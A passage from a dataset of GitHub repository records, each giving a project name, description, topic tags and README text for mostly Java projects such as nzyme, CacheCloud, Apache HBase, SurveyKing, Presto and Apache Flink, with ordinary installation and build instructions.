others. This project is licensed under MIT No Attribution (SPDX: MIT-0).
0
nzymedefense/nzyme
Network Defense System.
detection ethernet ids ndr network response security visibility wifi wireless
# nzyme - Network Defense System [![Codecov](https://img.shields.io/codecov/c/github/lennartkoopmann/nzyme.svg)](https://codecov.io/gh/lennartkoopmann/nzyme/) [![License](https://img.shields.io/badge/license-SSPL-brightgreen)](http://www.mongodb.com/licensing/server-side-public-license) Learn more at https://www.nzyme.org/. **Version 2.0.0 of nzyme is currently in development. The previous website for v1.x is archived [here](https://v1.nzyme.org/).** ## Contributing There are many ways to contribute and all community interaction is absolutely welcome: * Open an issue for any kind of bug you think you have found. * Open an issue for anything that was confusing to you. Bad, missing or confusing documentation is considered a bug. * Open a Pull Request for a new feature or a bugfix. It is a good idea to get in contact first to make sure that it fits the roadmap and has a chance to be merged. * Write documentation. * Write a blog post. * Help a user in the issue tracker or the IRC channel (#nzyme on FreeNode.) * Get in contact and say how you use it or what would be a cool addition. * Tell the world. Please be aware of the [Code of Conduct](CODE_OF_CONDUCT.md) that will be enforced across all channels and platforms. ## Legal notice Make sure to comply with local laws, especially with regards to wiretapping, when running nzyme. Note that nzyme is never decrypting any data but only reading unencrypted data.
0
sohutv/cachecloud
搜狐视频(sohu tv)Redis私有云平台 :支持Redis多种架构(Standalone、Sentinel、Cluster)高效管理、有效降低大规模redis运维成本,提升资源管控能力和利用率。平台提供快速搭建/迁移,运维管理,弹性伸缩,统计监控,客户端整合接入等功能。(CacheCloud is a Redis cloud management platform. It supports Standalone, Sentinel, and Cluster architectures for Redis, effectively reducing large-scale Redis operation and maintenance costs, and improving resource management and utilization. The platform provides rapid construction/migration, operation and maintenance management, elastic scaling, statistical monitoring, client integration and access and other functions)
cachecloud java jedis lettuce redis redis-cache redis-client redis-cluster redis-monitor redis-sentinel
[中文](README_CN.md) | [EN](README_EN.md) ![cachecloud云平台](cachecloud-web/src/main/resources/static/img/readme/cachecloud-head.png) [![CI checks on main badge]][CI checks on main link] [![latest release badge]][latest release link] [![github stars badge]][github stars link] [![github forks badge]][github forks link] [![github open issues badge]][github open issues link] [![github open prs badge]][github open prs link] [![latest commit to main badge]][latest commit to main link] [CI checks on main badge]: https://flat.badgen.net/github/checks/sohutv/cachecloud/main?label=CI%20status%20on%20main&cache=900&icon=github [CI checks on main link]:https://github.com/sohutv/cachecloud/actions?query=branch%3Amain [github forks badge]: https://flat.badgen.net/github/forks/sohutv/cachecloud?icon=github [github forks link]: https://useful-forks.github.io/?repo=sohutv%2Fcachecloud [github open issues badge]: https://flat.badgen.net/github/open-issues/sohutv/cachecloud?icon=github [github open issues link]: https://github.com/sohutv/cachecloud/issues?q=is%3Aissue+is%3Aopen [github open prs badge]: https://flat.badgen.net/github/open-prs/sohutv/cachecloud?icon=github [github open prs link]: https://github.com/sohutv/cachecloud/pulls?q=is%3Apr+is%3Aopen [github stars badge]: https://flat.badgen.net/github/stars/sohutv/cachecloud?icon=github [github stars link]: https://github.com/sohutv/cachecloud/stargazers [latest commit to main badge]: https://flat.badgen.net/github/last-commit/sohutv/cachecloud/main?icon=github&color=yellow&label=last%20dev%20commit&cache=900 [latest commit to main link]: https://github.com/sohutv/cachecloud/commits/main [latest release badge]: https://flat.badgen.net/github/release/sohutv/cachecloud/development?icon=github [latest release link]: https://github.com/sohutv/cachecloud/releases <div align="center"> <h2>CacheCloud云平台</h2> <a href="https://github.com/sohutv/cachecloud/blob/main/cachecloud-web/src/main/resources/static/wiki/quickstart/index.md">Quickstart</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="https://github.com/sohutv/cachecloud/blob/main/cachecloud-web/src/main/resources/static/wiki/access/client.md">Client</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="https://github.com/sohutv/cachecloud/wiki">Docs</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="https://github.com/sohutv/cachecloud/wiki#%E5%85%ADfaq%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98">FAQ</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="http://43.137.44.6:8080/admin/app/list">Demo</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="https://github.com/sohutv/cachecloud/issues/289">Feedback</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="https://github.com/sohutv/cachecloud#contact">Contact</a> <hr /> </div> ## CacheCloud是什么? CacheCloud是一个Redis云管理平台:支持Redis多种架构(Standalone、Sentinel、Cluster)高效管理、有效降低大规模redis运维成本,提升资源管控能力和利用率。平台提供快速搭建/迁移,运维管理,弹性伸缩,统计监控,客户端整合接入等功能。 <img src="cachecloud-web/src/main/resources/static/img/readme/cachecloud-info.png" width="100%"/> ## CacheCloud功能架构 + Redis搭建:宿主环境初始化、实例部署安装、类型架构支持; + 运维管理:宿主环境、资源管理、应用审计、应用运维、质量监控、诊断分析; + 统计监控:日志采集、实例采集、机器采集、应用统计、监控告警、问题诊断; + 客户端接入:SDK接入、语言接入、客户端监控; + 弹性伸缩:资源收缩、应用伸缩、外部接入; <img src="cachecloud-web/src/main/resources/static/img/readme/CacheCloud功能架构.png" width="100%"/> <a name="cc4"/> ## CacheCloud使用规模 + 800亿+ commands/day + 18T+ Memory Total + 420+ app Total / 4800+ Instances Total + 80+ Physical machine/ 360+ K8s Pod Total <a name="cc5"/> ## CacheCloud VS 云厂商 <img src="cachecloud-web/src/main/resources/static/img/readme/sentinel-cost.png" width="50%"/><img src="cachecloud-web/src/main/resources/static/img/readme/cluster-cost.png" width="50%"/> <div align="center">Redis 主从/集群部署成本</div> ## 贡献成员 <a href="https://github.com/sohutv/cachecloud/graphs/contributors"> <img src="https://contrib.rocks/image?repo=sohutv/cachecloud" /> </a> ## 感谢支持者 ![Stargazers repo roster for @sohutv/cachecloud](https://bytecrank.com/nastyox/reporoster/php/stargazersSVG.php?user=sohutv&repo=cachecloud) ![Forkers repo roster for @sohutv/cachecloud](https://bytecrank.com/nastyox/reporoster/php/forkersSVG.php?user=sohutv&repo=cachecloud) <a name="contact"/> ## 联系我们 + QQ群: 534429768(已满) / 2群:894022242 / 3群:908821300 + 微信群: <img src="http://photocdn.tv.sohu.com/img/cachecloud/weixin.jpg" width="30%"/> <img src="cachecloud-web/src/main/resources/static/img/readme/subcribe.png" width="30%"/> + 微信:如果大家有公网资源可以联系我,会加入到开源版本服务资源部署试用,提高大家的用户体验。 <img src="cachecloud-web/src/main/resources/static/img/readme/wechat.png" width="30%"/> 如果你觉得CacheCloud对你有帮助,欢迎Star⭐。
0
apache/hbase
Apache HBase
database hbase java
<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> ![hbase-logo](https://raw.githubusercontent.com/apache/hbase/master/src/site/resources/images/hbase_logo_with_orca_large.png) [Apache HBase](https://hbase.apache.org) is an open-source, distributed, versioned, column-oriented store modeled after Google' [Bigtable](https://research.google.com/archive/bigtable.html): A Distributed Storage System for Structured Data by Chang et al. Just as Bigtable leverages the distributed data storage provided by the Google File System, HBase provides Bigtable-like capabilities on top of [Apache Hadoop](https://hadoop.apache.org/). # Getting Start To get started using HBase, the full documentation for this release can be found under the doc/ directory that accompanies this README. Using a browser, open the docs/index.html to view the project home page (or browse https://hbase.apache.org). The hbase '[book](https://hbase.apache.org/book.html)' has a 'quick start' section and is where you should being your exploration of the hbase project. The latest HBase can be downloaded from the [download page](https://hbase.apache.org/downloads.html). We use mailing lists to send notice and discuss. The mailing lists and archives are listed [here](http://hbase.apache.org/mail-lists.html) # How to Contribute The source code can be found at https://hbase.apache.org/source-repository.html The HBase issue tracker is at https://hbase.apache.org/issue-tracking.html Notice that, the public registration for https://issues.apache.org/ has been disabled due to spam. If you want to contribute to HBase, please visit the [Request a jira account](https://selfserve.apache.org/jira-account.html) page to submit your request. Please make sure to select **hbase** as the '_ASF project you want to file a ticket_' so we can receive your request and process it. > **_NOTE:_** we need to process the requests manually so it may take sometime, for example, up to a week, for us to respond to your request. # About Apache HBase is made available under the [Apache License, version 2.0](https://hbase.apache.org/license.html) The HBase distribution includes cryptographic software. See the export control notice [here](https://hbase.apache.org/export_control.html).
0
javahuang/SurveyKing
Make a better survey system.
java react-survey springboot survey surveyjs surveymonkey
# 卷王 简体中文 | [English](./README.en-us.md) ## 功能最强大的调查问卷系统和考试系统 [点击](https://wj.surveyking.cn/s/start)卷王问卷考试系统-快速开始 需要您的 star ⭐️⭐️⭐️ 支持鼓励 🙏🙏🙏,**右上角点 Star (非强制)加QQ群(1074277968)获取最新的数据库脚本**。 ## 快速开始(一键部署) ### 🚀 1 分钟快速体验调查问卷系统(无需安装数据库) 1. 下载卷王快速体验安装包(加群) 2. 解压,双击运行 start.bat 3. 打开浏览器访问 [http://localhost:1991](http://localhost:1991),输入账号密码: *admin*/*123456* ### 一键 docker 部署 ```bash docker run -p 1991:1991 surveyking/surveyking ``` ## 特性 - 🥇 支持 20 多种题型,如填空、选择、下拉、级联、矩阵、分页、签名、题组、上传、[横向填空](https://wj.surveyking.cn/s/EMqvs7)等 - 🎉 多种创建问卷方式,Excel导入问卷、文本导入问卷、在线编辑器编辑问卷 - 💪 多种问卷设置,支持白名单答卷、公开查询、答卷限制等 - 🎇 数据,支持问卷数据新增、编辑、标记、导出、打印、预览和打包下载附件 - 🎨 报表,支持对问题实时统计分析并以图形(条形图、柱形图、扇形图)、表格的形式展示输出和导出 - 🚀 安装部署简单(**最快 1 分钟部署**),支持一键windows部署、一键docker部署、前后端分离部署、单jar部署、二级目录部署 - 🥊 响应式布局,所有页面完美适配电脑端和移动端(包含问卷编辑、设置、答卷) - 👬 支持多人协作管理问卷 - 🎁 后端支持多种数据库,可支持所有带有 jdbc 驱动的关系型数据库 - 🐯 安全、可靠、稳定、高性能的后端 API 服务 - 🙆 支持完善的 RBAC 权限控制 - 🦋 支持可视化配置问卷跳转和显示逻辑,以及通过公式实现自定义逻辑(卷王的逻辑设置比目前主流商业调查问卷系统强大的多) - **显示隐藏逻辑** - **值计算逻辑** 动态计算问题答案,从最简单的根据身高体重计算BMI,到复杂的根据多个问题答案组合逻辑和数值实现复杂的运算 - **文本替换逻辑** 动态显示题目内容 - **值校验逻辑** 可以根据其他问题答案来判断当前问题是否有效 - **必填逻辑** 动态判断当前问题是否必填 - **选项自动勾选逻辑** 根据其他问题和选项答案自动勾选 - **选项显示隐藏逻辑** 动态的显示或者隐藏选项 - **结束问卷逻辑** - **跳转逻辑** 动态跳转 - **结束问卷自定义提示语逻辑** 答卷后,可以根据问卷答案或者考试分数来显示不同的提示语信息 - **自定义跳转链接逻辑** 答卷后,可以根据问卷答案或者考试分数来跳转到不同的链接,且支持携带答案参数 - 🌈 支持选项唯一设置,多问卷数据关联查询、更新和删除,考试自动算分,自定义提示语,自定义跳转链接等等 ## 问卷产品对比 | | 问卷网 | 腾讯问卷 | 问卷星 | 金数据 | 卷王 | | --------------- | ------ | -------- | ------ | ------ | ---- | | 问卷调查 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ | | 在线考试 | ✔️ | ❌ | ✔️ | ✔️ | ✔️ | | 投票 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ | | 支持题型 | 🥇 | 🥉 | 🥇 | 🥈 | 🥈 | | 题型设置 | 🥇 | 🥉 | 🥇 | 🥇 | 🥇 | | 自动计算 | ❌ | ❌ | 🥉 | 🥈 | 🥇 | | 逻辑设置 | 🥈 | 🥈 | 🥈 | 🥈 | 🥇 | | 自定义校验 | ❌ | ❌ | ❌ | ❌ | ✔️ | | 自定义导出 | 🥈 | ❌ | ❌ | 🥉 | 🥇 | | 手机端编辑 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ | | 公开查询(快查) | ✔️ | ❌ | ✔️ | ❌ | ✔️ | | 私有部署 | 💰💰💰 | 💰💰💰 | 💰💰💰 | 💰💰💰 | 🆓 | 注: 上表与卷王对比的全部是商业问卷产品,他们有很多地方值得卷王学习,仅列出部分主要功能供大家参考,如果对结果有疑问,可以点击对应产品的链接自行对比体验。 🥇强 🥈中 🥉弱 ## 友情推荐 [专注于中台化架构的低代码生成工具](https://gitee.com/orangeform/orange-admin) ## 预览截图 * 考试系统预览 <table> <tr> <td><img src="docs/images/exam-editor.jpg"/></td> <td><img src="docs/images/exam-import.jpg"/></td> </tr> <tr> <td><img src="docs/images/exam-pc-prev.jpg"/></td> <td><img src="docs/images/exam-mb-preview.jpeg"/></td> </tr> <tr> <td><img src="docs/images/exam-repo-list.jpg"/></td> <td><img src="docs/images/exam-repo-pick.jpg"/></td> </tr> <tr> <td><img src="docs/images/exam-repo-qedit.jpg"/></td> <td><img src="docs/images/exam-repo.jpg"/></td> </tr> </table> * 调查问卷预览 <table> <tr> <td><img src="docs/images/survey-editor.jpg"/></td> <td><img src="docs/images/survey-editor-formula.jpg"/></td> </tr> <tr> <td><img src="docs/images/survey-editor-preview.jpg"/></td> <td><img src="docs/images/survey-imp.jpg"/></td> </tr> <tr> <td><img src="docs/images/survey-export.jpg"/></td> <td><img src="docs/images/survey-exp-preview.jpg"/></td> </tr> <tr> <td><img src="docs/images/survey-exp-formula.jpg"/></td> <td><img src="docs/images/survey-formula.jpg"/></td> </tr> <tr> <td><img src="docs/images/survey-editor-preview.jpg"/></td> <td><img src="docs/images/survey-prev-mbmi.jpeg"/></td> </tr> <tr> <td><img src="docs/images/survey-report.jpg"/></td> <td><img src="docs/images/survey-setting.jpg"/></td> </tr> <tr> <td><img src="docs/images/survey-sys.jpg"/></td> <td><img src="docs/images/survey-post.jpg"/></td> </tr> </table>
0
kermitt2/grobid
A machine learning software for extracting information from scholarly documents
bibliographical-references crf deep-learning fulltext hamburger-to-cow machine-learning metadata pdf rnn scientific-articles transformers
null
0
codedrinker/community
开源论坛、问答系统,现有功能提问、回复、通知、最新、最热、消除零回复功能。功能持续更新中…… 技术栈 Spring、Spring Boot、MyBatis、MySQL/H2、Bootstrap
bootstrap flyway h2-database mybatis mybatis-generator mysql spring springboot
## 码问 ## 在线演示地址 [https://www.mawen.co](https://www.mawen.co),任何配置、使用和答疑问题,可以 👉[点击](#联系我) 联系我,也可以拉你进群沟通。 ## 功能列表 开源论坛、问答系统,现有功能多社交平台登录(Github,Gitee)提问、回复、通知、最新问答、最热热大、消除零回复等功能。 ## 当前项目配套的手把手视频教程 | 标题 | 链接 | | --- | --- | | 【Spring Boot 实战】论坛项目【第一季】 | [BV1r4411r7au](https://www.bilibili.com/video/BV1r4411r7au) | | 【Spring Boot 实战】热门话题,经典面试问题实战,TopN 问题【第二季】| [BV1Z4411f7RK](https://www.bilibili.com/video/BV1Z4411f7RK) | | 【Spring Boot 实战】接入广告流量变现(让你的网站益起来)【第三季】 | [BV1L4411y7J9](https://www.bilibili.com/video/BV1L4411y7J9) | | 【Spring Boot 实战】Vue 零基础入门(前后端分离的前置视频)【第四季】 | [BV1gE411R7YA](https://www.bilibili.com/video/BV1gE411R7YA) | | 【Spring Boot 实战】Java 设计模式实战(加薪的必修课)【第五季】 | [BV1UK4y1M7PC](https://www.bilibili.com/video/BV1UK4y1M7PC) | | 【Spring Boot 实战】快速搭建免费 HTTPS 服务 | [BV1oJ411K7VT](https://www.bilibili.com/video/BV1oJ411K7VT) | ## 本地运行手册 1. 安装必备工具 JDK,Maven 2. 克隆代码到本地 ```sh git clone https://github.com/codedrinker/community.git ```` 3. 运行数据库脚本,创建本地数据库 ```sh mvn flyway:migrate ``` 如果需要使用 MySQL 数据库,运行脚本前修改两处配置 ``` # src/main/resources/application.properties spring.datasource.url=jdbc:h2:~/community spring.datasource.username=sa spring.datasource.password=123 ``` ``` # pom.xml <properties> <db.url>jdbc:h2:~/community</db.url> <db.user>sa</db.user> <db.password>123</db.password> </properties> ``` 4. 运行打包命令,生成可执行 jar 文件 ```sh mvn package -DskipTests ``` 4. 运行项目 ```sh java -jar target/community-0.0.1-SNAPSHOT.jar ``` 如果是线上部署,可以增加配置文件(production.properties),同时运行命令修改如下 ```sh java -jar -Dspring.profiles.active=production target/community-0.0.1-SNAPSHOT.jar ``` 5. 访问项目 ``` http://localhost:8887 ``` ## 其他 1. 视频初期未使用 Flyway 之前的数据库脚本 ```sql CREATE TABLE USER ( ID int AUTO_INCREMENT PRIMARY KEY NOT NULL, ACCOUNT_ID VARCHAR(100), NAME VARCHAR(50), TOKEN VARCHAR(36), GMT_CREATE BIGINT, GMT_MODIFIED BIGINT ); ``` 2. 生成 Model 等 MyBatis 配置文件的命令 ``` mvn -Dmybatis.generator.overwrite=true mybatis-generator:generate ``` ## 技术栈 | 技术 | 链接 | | --- | --- | | Spring Boot | http://projects.spring.io/spring-boot/#quick-start | | MyBatis | https://mybatis.org/mybatis-3/zh/index.html | | MyBatis Generator | http://mybatis.org/generator/ | | H2 | http://www.h2database.com/html/main.html | | Flyway | https://flywaydb.org/getstarted/firststeps/maven | |Lombok| https://www.projectlombok.org | |Bootstrap|https://v3.bootcss.com/getting-started/| |Github OAuth|https://developer.github.com/apps/building-oauth-apps/creating-an-oauth-app/| |UFile|https://github.com/ucloud/ufile-sdk-java| |Bootstrap|https://v3.bootcss.com/getting-started/| ## 扩展资料 [Spring 文档](https://spring.io/guides) [Spring Web](https://spring.io/guides/gs/serving-web-content/) [es](https://elasticsearch.cn/explore) [Github deploy key](https://developer.github.com/v3/guides/managing-deploy-keys/#deploy-keys) [Bootstrap](https://v3.bootcss.com/getting-started/) [Github OAuth](https://developer.github.com/apps/building-oauth-apps/creating-an-oauth-app/) [Spring](https://docs.spring.io/spring-boot/docs/2.0.0.RC1/reference/htmlsingle/#boot-features-embedded-database-support) [菜鸟教程](https://www.runoob.com/mysql/mysql-insert-query.html) [Thymeleaf](https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#setting-attribute-values) [Spring Dev Tool](https://docs.spring.io/spring-boot/docs/2.0.0.RC1/reference/htmlsingle/#using-boot-devtools) [Spring MVC](https://docs.spring.io/spring/docs/5.0.3.RELEASE/spring-framework-reference/web.html#mvc-handlermapping-interceptor) [Markdown 插件](http://editor.md.ipandao.com/) [UFfile SDK](https://github.com/ucloud/ufile-sdk-java) [Count(*) VS Count(1)](https://mp.weixin.qq.com/s/Rwpke4BHu7Fz7KOpE2d3Lw) [Git](https://git-scm.com/download) [Visual Paradigm](https://www.visual-paradigm.com) [Flyway](https://flywaydb.org/getstarted/firststeps/maven) [Lombok](https://www.projectlombok.org) [ctotree](https://www.octotree.io/) [Table of content sidebar](https://chrome.google.com/webstore/detail/table-of-contents-sidebar/ohohkfheangmbedkgechjkmbepeikkej) [One Tab](https://chrome.google.com/webstore/detail/chphlpgkkbolifaimnlloiipkdnihall) [Live Reload](https://chrome.google.com/webstore/detail/livereload/jnihajbhpnppcggbcgedagnkighmdlei/related) [Postman](https://chrome.google.com/webstore/detail/coohjcphdfgbiolnekdpbcijmhambjff) ## 更新日志 - 2019-7-30 修复 session 过期时间很短问题 - 2019-8-2 修复因为*和+号产生的搜索异常问题 - 2019-8-18 添加首页按照最新、最热、零回复排序 - 2019-8-18 修复搜索输入 ? 号出现异常问题 - 2019-8-22 修复图片大小限制和提问内容为空问题 - 2019-9-1 添加动态导航栏 - 2021-7-5 修复因为网络原因不能拉去到自定义 spring starter 问题 ## 联系我 有任何问题可以扫码下面两个二维码找到我,左边是微信订阅号,关注回复 ‘面试’即可获得我整理的(2W字)阿里面经,右边是个人微信号,有任何技术上面的问题可以给我留言。 | 微信公众号 | 个人微信 | | --- | --- | | 码匠笔记 | fit8295 | | ![](https://mawen-cdn.cn-bj.ufileos.com/wxdyh-qr.jpeg?iopcmd=thumbnail&type=1&scale=50) | ![](http://mawen-cdn.cn-bj.ufileos.com/wechat.jpeg?iopcmd=thumbnail&type=1&scale=50) |
0
apache/ratis
Open source Java implementation for Raft consensus protocol.
consensus consensus-protocol java raft
<!-- Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. See accompanying LICENSE file. --> # Apache Ratis *[Apache Ratis]* is a Java library that implements the Raft protocol [1], where an extended version of the Raft paper is available at <https://raft.github.io/raft.pdf>. The paper introduces Raft and states its motivations in following words: > Raft is a consensus algorithm for managing a replicated log. > It produces a result equivalent to (multi-)Paxos, and it is as efficient as Paxos, > but its structure is different from Paxos; this makes Raft more understandable than Paxos > and also provides a better foundation for building practical systems. Ratis aims to make Raft available as a java library that can be used by any system that needs to use a replicated log. It provides pluggability for state machine implementations to manage replicated states. It also provides pluggability for Raft log, rpc implementations and metric implementations to make it easy for integration with other projects. Another important goal is to support high throughput data ingest so that it can be used for more general data replication use cases. * To build the artifacts, see [BUILDING.md](BUILDING.md). * To run the examples, see [ratis-examples/README.md](ratis-examples/README.md). ## Reference 1. Diego Ongaro and John Ousterhout, _[In Search of an Understandable Consensus Algorithm][Ongaro2014]_, 2014 USENIX Annual Technical Conference (USENIX ATC 14) (Philadelphia, PA), USENIX Association, 2014, pp. 305-319. [Ongaro2014]: https://www.usenix.org/conference/atc14/technical-sessions/presentation/ongaro [Apache Ratis]: https://ratis.apache.org/
0
allure-framework/allure2
Allure Report is a flexible, lightweight multi-language test reporting tool. It provides clear graphical reports and allows everyone involved in the development process to extract the maximum of information from the everyday testing process
allure reporting reporting-engine
[license]: http://www.apache.org/licenses/LICENSE-2.0 "Apache License 2.0" [site]: https://allurereport.org/?source=github_allure2 "Official Website" [docs]: https://allurereport.org/docs/?source=github_allure2 "Documentation" [qametaio]: https://qameta.io/?source=Report_GitHub "Qameta Software" [blog]: https://qameta.io/blog "Qameta Software Blog" [Twitter]: https://twitter.com/QametaSoftware "Qameta Software" [twitter-team]: https://twitter.com/QametaSoftware/lists/team/members "Team" [build]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml [build-badge]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml/badge.svg [maven]: https://repo.maven.apache.org/maven2/io/qameta/allure/allure-commandline/ "Maven Central" [maven-badge]: https://img.shields.io/maven-central/v/io.qameta.allure/allure-commandline.svg?style=flat [release]: https://github.com/allure-framework/allure2/releases/latest "Latest release" [release-badge]: https://img.shields.io/github/release/allure-framework/allure2.svg?style=flat [CONTRIBUTING.md]: .github/CONTRIBUTING.md [CODE_OF_CONDUCT.md]: CODE_OF_CONDUCT.md # Allure Report [![build-badge][]][build] [![release-badge][]][release] [![maven-badge][]][maven] [![Backers on Open Collective](https://opencollective.com/allure-report/backers/badge.svg)](#backers) [![Sponsors on Open Collective](https://opencollective.com/allure-report/sponsors/badge.svg)](#sponsors) > Allure Report is a flexible multi-language test report tool to show you a detailed representation of what has been tested and extract maximum from the everyday execution of tests. <img src="https://allurereport.org/public/img/allure-report.svg" height="85px" alt="Allure Report logo" align="right" /> - Learn more about Allure Report at [https://allurereport.org](https://allurereport.org) - 📚 [Documentation](https://allurereport.org/docs/) – discover official documentation for Allure Report - ❓ [Questions and Support](https://github.com/orgs/allure-framework/discussions/categories/questions-support) – get help from the team and community - 📢 [Official announcements](https://github.com/orgs/allure-framework/discussions/categories/announcements) – stay updated with our latest news and updates - 💬 [General Discussion](https://github.com/orgs/allure-framework/discussions/categories/general-discussion) – engage in casual conversations, share insights and ideas with the community - 🖥️ [Live Demo](https://demo.allurereport.org/) — explore a live example of Allure Report in action --- ## Download You can use one of the following ways to get Allure: * Grab it from [releases](https://github.com/allure-framework/allure2/releases) (see Assets section). * Using Homebrew: ```bash $ brew install allure ``` * For Windows, Allure is available from the [Scoop](http://scoop.sh/) commandline-installer. To install Allure, download and install Scoop and then execute in the Powershell: ```bash scoop install allure ``` ## How Allure Report works Allure Report can build unified reports for dozens of testing tools across eleven programming languages on several CI/CD systems. ![How Allure Report works](.github/how_allure_works.jpg) ## Allure TestOps [DevOps-ready Testing Platform built][qametaio] to reduce code time-to-market without quality loss. You can set up your product quality control and boost your QA and development team productivity by setting up your TestOps. ## Contributors This project exists thanks to all the people who contributed. [[Contribute]](.github/CONTRIBUTING.md). <a href="https://github.com/allure-framework/allure2/graphs/contributors"><img src="https://opencollective.com/allure-report/contributors.svg?avatarHeight=24&width=890&showBtn=false" /></a>
0
prestodb/presto
The official home of the Presto distributed SQL query engine for big data
big-data data hadoop hive java lakehouse presto query sql
# Presto Presto is a distributed SQL query engine for big data. See the [User Manual](https://prestodb.github.io/docs/current/) for deployment instructions and end user documentation. ## Contributing! Please refer to the [contribution guidelines](https://github.com/prestodb/presto/blob/master/CONTRIBUTING.md) to get started ## Questions? [Please join our Slack channel and ask in `#dev`](https://communityinviter.com/apps/prestodb/prestodb).
0
apache/flink
Apache Flink
big-data flink java python scala sql
# Apache Flink Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities. Learn more about Flink at [https://flink.apache.org/](https://flink.apache.org/) ### Features * A streaming-first runtime that supports both batch processing and data streaming programs * Elegant and fluent APIs in Java and Scala * A runtime that supports very high throughput and low event latency at the same time * Support for *event time* and *out-of-order* processing in the DataStream API, based on the *Dataflow Model* * Flexible windowing (time, count, sessions, custom triggers) across different time semantics (event time, processing time) * Fault-tolerance with *exactly-once* processing guarantees * Natural back-pressure in streaming programs * Libraries for Graph processing (batch), Machine Learning (batch), and Complex Event Processing (streaming) * Built-in support for iterative programs (BSP) in the DataSet (batch) API * Custom memory management for efficient and robust switching between in-memory and out-of-core data processing algorithms * Compatibility layers for Apache Hadoop MapReduce * Integration with YARN, HDFS, HBase, and other components of the Apache Hadoop ecosystem ### Streaming Example ```scala case class WordWithCount(word: String, count: Long) val text = env.socketTextStream(host, port, '\n') val windowCounts = text.flatMap { w => w.split("\\s") } .map { w => WordWithCount(w, 1) } .keyBy("word") .window(TumblingProcessingTimeWindow.of(Time.seconds(5))) .sum("count") windowCounts.print() ``` ### Batch Example ```scala case class WordWithCount(word: String, count: Long) val text = env.readTextFile(path) val counts = text.flatMap { w => w.split("\\s") } .map { w => WordWithCount(w, 1) } .groupBy("word") .sum("count") counts.writeAsCsv(outputPath) ``` ## Building Apache Flink from Source Prerequisites for building Flink: * Unix-like environment (we use Linux, Mac OS X, Cygwin, WSL) * Git * Maven (we require version 3.8.6) * Java 8 or 11 (Java 9 or 10 may work) ``` git clone https://github.com/apache/flink.git cd flink ./mvnw clean package -DskipTests # this will take up to 10 minutes ``` Flink is now installed in `build-target`. ## Developing Flink The Flink committers use IntelliJ IDEA to develop the Flink codebase. We recommend IntelliJ IDEA for developing projects that involve Scala code. Minimal requirements for an IDE are: * Support for Java and Scala (also mixed projects) * Support for Maven with Java and Scala ### IntelliJ IDEA The IntelliJ IDE supports Maven out of the box and offers a plugin for Scala development. * IntelliJ download: [https://www.jetbrains.com/idea/](https://www.jetbrains.com/idea/) * IntelliJ Scala Plugin: [https://plugins.jetbrains.com/plugin/?id=1347](https://plugins.jetbrains.com/plugin/?id=1347) Check out our [Setting up IntelliJ](https://nightlies.apache.org/flink/flink-docs-master/flinkDev/ide_setup.html#intellij-idea) guide for details. ### Eclipse Scala IDE **NOTE:** From our experience, this setup does not work with Flink due to deficiencies of the old Eclipse version bundled with Scala IDE 3.0.3 or due to version incompatibilities with the bundled Scala version in Scala IDE 4.4.1. **We recommend to use IntelliJ instead (see above)** ## Support Don’t hesitate to ask! Contact the developers and community on the [mailing lists](https://flink.apache.org/community.html#mailing-lists) if you need any help. [Open an issue](https://issues.apache.org/jira/browse/FLINK) if you find a bug in Flink. ## Documentation The documentation of Apache Flink is located on the website: [https://flink.apache.org](https://flink.apache.org) or in the `docs/` directory of the source code. ## Fork and Contribute This is an active open-source project. We are always open to people who want to use the system or contribute to it. Contact us if you are looking for implementation tasks that fit your skills. This article describes [how to contribute to Apache Flink](https://flink.apache.org/contributing/how-to-contribute.html). ## Externalized Connectors Most Flink connectors have been externalized to individual repos under the [Apache Software Foundation](https://github.com/apache): * [flink-connector-aws](https://github.com/apache/flink-connector-aws) * [flink-connector-cassandra](https://github.com/apache/flink-connector-cassandra) * [flink-connector-elasticsearch](https://github.com/apache/flink-connector-elasticsearch) * [flink-connector-gcp-pubsub](https://github.com/apache/flink-connector-gcp-pubsub) * [flink-connector-hbase](https://github.com/apache/flink-connector-hbase) * [flink-connector-jdbc](https://github.com/apache/flink-connector-jdbc) * [flink-connector-kafka](https://github.com/apache/flink-connector-kafka) * [flink-connector-mongodb](https://github.com/apache/flink-connector-mongodb) * [flink-connector-opensearch](https://github.com/apache/flink-connector-opensearch) * [flink-connector-prometheus](https://github.com/apache/flink-connector-prometheus) * [flink-connector-pulsar](https://github.com/apache/flink-connector-pulsar) * [flink-connector-rabbitmq](https://github.com/apache/flink-connector-rabbitmq) ## About Apache Flink is an open source project of The Apache Software Foundation (ASF). The Apache Flink project originated from the [Stratosphere](http://stratosphere.eu) research project.
0
stanfordnlp/CoreNLP
CoreNLP: A Java suite of core NLP tools for tokenization, sentence segmentation, NER, parsing, coreference, sentiment analysis, etc.
named-entity-recognition natural-language-processing nlp nlp-parsing stanford-nlp
